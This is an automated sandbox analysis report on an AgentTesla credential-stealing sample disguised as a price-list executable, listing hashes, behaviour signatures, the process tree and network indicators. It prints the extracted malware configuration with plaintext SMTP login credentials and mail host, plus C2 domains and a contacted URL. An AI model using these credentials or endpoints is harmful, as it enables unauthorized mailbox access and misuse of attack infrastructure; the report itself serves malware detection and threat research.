Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PRICE LIST (NOVEMBER 2020).exe

Overview

General Information

Sample Name:PRICE LIST (NOVEMBER 2020).exe
Analysis ID:356549
MD5:404ef05a6acc67c2b59189171f9eb0fc
SHA1:0ecf315e5a72a3c9ddd386d1116d2265877b4027
SHA256:863d464bb43bda7378c611a5c16410a3c279ca72e447632f5e03f8418f5464d8
Tags:AgentTeslaexe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Binary contains a suspicious time stamp
C2 URLs / IPs found in malware configuration
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • PRICE LIST (NOVEMBER 2020).exe (PID: 7024 cmdline: 'C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe' MD5: 404EF05A6ACC67C2B59189171F9EB0FC)
    • cmd.exe (PID: 5932 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 4852 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "uZpecWaWaVj1vP", "URL: ": "http://L2JzF7P98hlnK.net", "To: ": "jose.carvalho@electrobelarmino.pt", "ByHost: ": "mail.electrobelarmino.pt:587", "Password: ": "drqmyQWtkw41E", "From: ": "jose.carvalho@electrobelarmino.pt"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                  Sigma Overview

                  No Sigma rule has matched

                  Signature Overview

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection:

                  barindex
                  Found malware configurationShow sources
                  Source: PRICE LIST (NOVEMBER 2020).exe.1508.8.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "uZpecWaWaVj1vP", "URL: ": "http://L2JzF7P98hlnK.net", "To: ": "jose.carvalho@electrobelarmino.pt", "ByHost: ": "mail.electrobelarmino.pt:587", "Password: ": "drqmyQWtkw41E", "From: ": "jose.carvalho@electrobelarmino.pt"}
                  Multi AV Scanner detection for submitted fileShow sources
                  Source: PRICE LIST (NOVEMBER 2020).exeReversingLabs: Detection: 25%
                  Machine Learning detection for sampleShow sources
                  Source: PRICE LIST (NOVEMBER 2020).exeJoe Sandbox ML: detected
                  Source: 8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                  Compliance:

                  barindex
                  Uses 32bit PE filesShow sources
                  Source: PRICE LIST (NOVEMBER 2020).exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
                  Source: PRICE LIST (NOVEMBER 2020).exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Binary contains paths to debug symbolsShow sources
                  Source: Binary string: System.Configuration.pdbY source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: nphjVisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.pdb"" source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdb-' source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: shlwapi.pdb% source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: rtutils.pdbE source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).PDB source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: i.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: urlmon.pdb! source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdbL source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: edputil.pdbg source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbp source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: nsi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: WLDP.pdbS source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: indows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: PRICE LIST (NOVEMBER 2020).PDBr source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: rasadhlp.pdb- source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).PDBY source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380724372.0000000000C80000.00000004.00000020.sdmp
                  Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: ole32.pdb@ source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: cryptsp.pdbR source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.391966580.0000000004F62000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.pdb-' source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbzI source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380581139.0000000000BFE000.00000004.00000020.sdmp
                  Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: ore.pdb\\ source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.ni.pdbT3el source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.ni.pdb-' source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: propsys.pdb5 source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb*0 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: iertutil.pdb} source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wmswsock.pdbO source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: oleaut32.pdbJ source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: wimm32.pdb.' source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb2 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdblo source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: rasman.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380581139.0000000000BFE000.00000004.00000020.sdmp
                  Source: Binary string: cfgmgr32.pdbT source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: .pdb88 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb* source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbi18 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: wUxTheme.pdb+ source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.391966580.0000000004F62000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb^ source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp

                  Networking:

                  barindex
                  C2 URLs / IPs found in malware configurationShow sources
                  Source: Malware configuration extractorURLs: http://L2JzF7P98hlnK.net
                  Source: global trafficHTTP traffic detected: GET /base/FBD1AA88F2DB3E5E79F7212492E97FE4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.21.71.230 104.21.71.230
                  Source: global trafficHTTP traffic detected: GET /base/FBD1AA88F2DB3E5E79F7212492E97FE4.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://CMvIqY.com
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.605811150.0000000002E2D000.00000004.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606314503.0000000002EA5000.00000004.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: http://L2JzF7P98hlnK.net
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.381179952.0000000002871000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.381179952.0000000002871000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/FBD1AA88F2DB3E5E79F7212492E97FE4.html
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
